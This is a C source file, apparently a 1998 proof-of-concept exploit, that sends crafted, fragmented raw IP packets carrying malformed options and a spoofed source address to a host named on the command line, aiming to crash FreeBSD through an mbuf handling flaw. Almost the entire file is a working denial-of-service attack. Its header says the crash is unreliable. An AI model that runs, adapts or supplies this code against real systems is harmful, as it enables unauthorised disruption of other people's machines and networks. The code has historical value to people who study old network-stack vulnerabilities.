Exploit code that occasionally crashes FreeBSD; exploits tcp/ip flaw with bof.
33476ecadd045d9953d5f7696cf9a509e56d2656b074b6bcb399c00cf3c9b48b
/* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
* I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/ip.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <strings.h>
u_long htona(char *host)
{
u_long addr;
struct hostent *hp;
if ((addr=inet_addr(host)) == INADDR_NONE) {
if ((hp = gethostbyname(host)) == NULL)
return(-1);
bcopy(hp->h_addr_list[0], &addr, sizeof(addr));
}
return(addr);
}
int main(int argc, char* argv[])
{
char buf[128];
struct ip *iph = (struct ip *)buf;
u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));
struct tcphdr *tcph = (struct tcphdr *)(buf + 60);
int s, i;
struct sockaddr_in sin;
if (argc != 2) {
printf("usage\n\t%s <host>\n", argv[0]);
exit(1);
}
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s < 0) {
perror("socket");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(7);
sin.sin_addr.s_addr = htona(argv[1]);
if (sin.sin_addr.s_addr == -1) {
printf("Error resolving %s\n", argv[1]);
exit(1);
}
bzero(buf, sizeof(buf));
iph->ip_hl=15;
iph->ip_v=4;
iph->ip_len=htons(124);
iph->ip_id= htons(getpid());
iph->ip_off= htons(IP_MF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
iph->ip_src.s_addr = htona("10.2.3.4");
for (i = 0; i < 20;i++) {
ipoptions[i]=0xff;
}
ipoptions[0] = 0xff; /* Made up option */
ipoptions[1] = 0x1a;
memset((char *)&ipoptions[2], 0xff, 37);
ipoptions[39] = 1; /* IP_NOP */
tcph->th_sport = htons(5505);
tcph->th_dport = htons(23);
tcph->th_seq = htonl(0xabcde123);
tcph->th_ack = htonl(0x321edcba);
tcph->th_flags = TH_ACK | TH_PUSH;
tcph->th_win = htons(0x1234);
if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
perror("sendto");
exit(1);
}
if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
perror("sendto");
exit(1);
}
iph->ip_len = htons(80);
iph->ip_off = htons(8);
if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
perror("sendto");
exit(1);
}
exit(0);
}